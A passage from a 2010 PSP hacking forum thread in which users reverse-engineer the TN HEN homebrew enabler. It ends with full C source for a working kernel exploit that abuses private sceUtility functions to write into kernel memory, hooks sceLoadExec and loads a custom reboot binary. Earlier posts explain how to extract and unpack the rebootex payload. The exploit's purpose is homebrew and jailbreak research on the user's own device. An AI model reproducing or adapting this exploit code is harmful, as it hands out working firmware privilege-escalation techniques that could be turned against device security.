Advertising
Reverse of TN HEN main function
Forum rules
Forum rule Nº 15 is strictly enforced in this subforum.
Forum rule Nº 15 is strictly enforced in this subforum.
Re: Reverse of TN HEN main function
So now, anybody have any plans to reverse the rebootex?
If you need US PSN Codes, this technique is what I recommend.
Looking for guest bloggers and news hunters here at wololo.net, PM me!
Looking for guest bloggers and news hunters here at wololo.net, PM me!
Re: Reverse of TN HEN main function
I'm already working on itWololo wrote:So now, anybody have any plans to reverse the rebootex?
Oh,btw,@JJS,you could just grab rebootex,bin2c it and include it in the main,there you go http://pastebin.com/nHJUqrsa
Advertising
https://github.com/freddy-156
<@n00b81> FREDDY CUTTIES
<@n00b81> FREDDY CUTTIES
Re: Reverse of TN HEN main function
me 2. Although it will take me quite a while to figure out how to get the raw rebootex.bin (ungzipped).FrEdDy wrote:I'm already working on itWololo wrote:So now, anybody have any plans to reverse the rebootex?
JJS has shown that it can be ripped 32000 bytes from 0x0000BB10, and then ungzip it. But I don't know
if the gzip algorithm is standard or any Sony specified.
Any hint? Thanks in advance.
Re: Reverse of TN HEN main function
It looks like regular gzip to me, I could rename the file with an gz extension and extract it with 7zip.
The rebootex seems to contain code at the start and then later some other compressed data since the unkcompressed file is only slightly larger than the compressed one and at some point the disassembly doesn't contain valid code. I guess the VSH menu plugin etc. has to be in there somewhere.
@FrEdDy: I know.
The rebootex seems to contain code at the start and then later some other compressed data since the unkcompressed file is only slightly larger than the compressed one and at some point the disassembly doesn't contain valid code. I guess the VSH menu plugin etc. has to be in there somewhere.
@FrEdDy: I know.
Re: Reverse of TN HEN main function
It contains a gzip'd copy of systemctrl,prxtool finds invalid code because it's a binary file,"real" code ends at 0x88FC0908 (0x00000908 if you didn't relocate)JJS wrote:It looks like regular gzip to me, I could rename the file with an gz extension and extract it with 7zip.
The rebootex seems to contain code at the start and then later some other compressed data since the unkcompressed file is only slightly larger than the compressed one and at some point the disassembly doesn't contain valid code. I guess the VSH menu plugin etc. has to be in there somewhere.
@FrEdDy: I know.
https://github.com/freddy-156
<@n00b81> FREDDY CUTTIES
<@n00b81> FREDDY CUTTIES
Re: Reverse of TN HEN main function
I see now. The file starts at 0x9E0 and is packed as "~PSP". Excuse my ignorance, but how do you unpack this file? It is packed with psp-packer from the M33 SDK, right?
vvvvv Thank you! vvvvv
vvvvv Thank you! vvvvv
Re: Reverse of TN HEN main function
Yes it is,you can unpack it with prxdecrypter by jas0nuk (http://www.psp-hacks.com/file/1834)JJS wrote:I see now. The file starts at 0x9E0 and is packed as "~PSP". Excuse my ignorance, but how do you unpack this file? It is packed with psp-packer from the M33 SDK, right?
https://github.com/freddy-156
<@n00b81> FREDDY CUTTIES
<@n00b81> FREDDY CUTTIES
Re: Reverse of TN HEN main function
You have really quick hand.FrEdDy wrote:Yes it is,you can unpack it with prxdecrypter by jas0nuk (http://www.psp-hacks.com/file/1834)JJS wrote:I see now. The file starts at 0x9E0 and is packed as "~PSP". Excuse my ignorance, but how do you unpack this file? It is packed with psp-packer from the M33 SDK, right?
Now I'm wondering how could VFlame release the fix only 6 hours after TN release.
Re: Reverse of TN HEN main function
Very interesting thread, sadly I couldn't participate due to internet connection problems 
I wanna lots of mov al,0xb
"just not into this RA stuffz"
"just not into this RA stuffz"
Re: Reverse of TN HEN main function
Finally got it working on PSP3004, g4. 
Here's the working code of VFlame version.
Many thanks to JJS and FrEdDy . The rebootex_bin is copied from FrEdDy. And the search for string sceVshHV is copied from JJS. Note that if I use the strncmp directly it just crashed.
Now it's time for me to start reading rebootex.
Here's the working code of VFlame version. Many thanks to JJS and FrEdDy . The rebootex_bin is copied from FrEdDy. And the search for string sceVshHV is copied from JJS. Note that if I use the strncmp directly it just crashed.
Now it's time for me to start reading rebootex.
Code: Select all
#include <stdio.h>
#include <string.h>
#include "pspsdk.h"
#include "pspkernel.h"
#include "psputility.h"
#include "psputilsforkernel.h"
PSP_MODULE_INFO("TEST", 0, 1, 0);
#define REBOOT_BIN_SZ 29168
static unsigned char rebootex_bin[];
static int (*func_rebootex)(unsigned int, unsigned int, unsigned int, unsigned int, unsigned int);
static int model;
#define set_value(__addr, __value) do {\
*((unsigned int *) (__addr)) = (unsigned int) (__value);\
} while (0)
/* sub_000002B4 */
static int
rebootex_callback(unsigned int a1, unsigned int a2, unsigned int a3,
unsigned int a4, unsigned int a5)
{
char *s, *s2;
s = (char *) 0x88FC0000;
s2 = (char *) (rebootex_bin + 0x77040000 + 0x88FC0000);
while (s < (char *) 0x88FC71F0) {
*s = *s2;
s++;
s2++;
}
s = (char *) 0x88FB0000;
while (s < (char *) 0x88FB0100) {
*s = 0;
s++;
}
set_value(0x88FB0004, REBOOT_BIN_SZ);
set_value(0x88FB0000, model);
return func_rebootex(a1, a2, a3, a4, a5);
}
/* sub_00000328 */
static int
power_callback(void)
{
unsigned int (*f1)(char *) = (void *) 0x8801EB78;
int (*f2)(void) = (void *) 0x8800A1C4;
void (*f3)(void) = (void *) 0x88000E98;
void (*f4)(void) = (void *) 0x88000744;
unsigned int addr;
unsigned int callback = (unsigned int) rebootex_callback;
int m;
addr = f1("sceLoadExec");
addr += 108;
addr = *(unsigned int *) addr;
m = f2();
if (m == 3)
m = 2;
model = m;
m ^= 4;
callback >>= 2;
callback &= 0x03FFFFFF;
callback |= 0x0C000000;
set_value(addr + ((m == 0) ? 0x2F28 : 0x2CD8), callback);
set_value(addr + ((m == 0) ? 0x2F74 : 0x2D24), 0x3C0188FC);
set_value(0x8800CCB0, 0xACC24230);
set_value(0x8800CCB4, 0x0A003322);
set_value(0x8800CCB8, 0x00001021);
set_value(0x8800CCBC, 0x3C058801);
func_rebootex = (void *) addr;
f3();
f4();
return 0;
}
static void
clear_cache(void)
{
sceKernelIcacheInvalidateAll();
sceKernelDcacheWritebackInvalidateAll();
}
int
main(void)
{
char buf[168];
pspUtilityHtmlViewerParam *param = (pspUtilityHtmlViewerParam *) buf;
unsigned int *p = (unsigned int *) buf;
SceUID sceuid;
unsigned int intr;
unsigned int* address_low = (unsigned int *) 0x08800000;
unsigned int* address_high = (unsigned int *) 0x08800004;
/* prototype of sceUtility_private_2DC8380C, scePower_driver_CE5D389B */
int (*f1)(int);
/* prototype of sceUtility_private_764F5A3C, scePower_driver_1A41E0ED */
void *(*f2)(int, SceUID);
memset(buf, 0, 168);
*p = 168;
p += 4;
*p = 19;
sceUtilityHtmlViewerInitStart(param);
sceKernelDelayThread(1000000);
while (address_high < (unsigned int *) 0x0A000000) {
if ((*address_low == 0x56656373) && (*address_high == 0x56486873))
goto found;
address_low++;
address_high++;
}
goto out;
found:
memset((void *) 0x08800000, 0, 0x00100000);
f1 = (void*) ((unsigned int) address_low - 648U); /* sceUtility_private_2DC8380C */
f1(0x08080000);
clear_cache();
p = (unsigned int *) 0x08800000;
do {
if (*p == 0xFFFFFFFF)
goto found2;
p++;
} while (p < (unsigned int *) 0x08900000);
goto out;
found2:
sceuid = sceKernelCreateCallback("test", 0, 0);
f2 = (void *) ((unsigned int) address_low - 624U); /* sceUtility_private_764F5A3C */
f2((0x0880CCB0U -(unsigned int) p) >> 4, sceuid);
clear_cache();
p = (unsigned int *) 0x08800010;
*p = (unsigned int) power_callback;
p = (unsigned int *) 0x08804234;
*p = 0x08800000;
clear_cache();
intr = sceKernelCpuSuspendIntr();
sceKernelPowerLock(0, 0x08800000);
sceKernelCpuResumeIntr(intr);
out:
sceKernelExitGame();
sceKernelExitDeleteThread(0);
return 1;
}
Last edited by jigsaw on Mon Dec 27, 2010 11:23 pm, edited 1 time in total.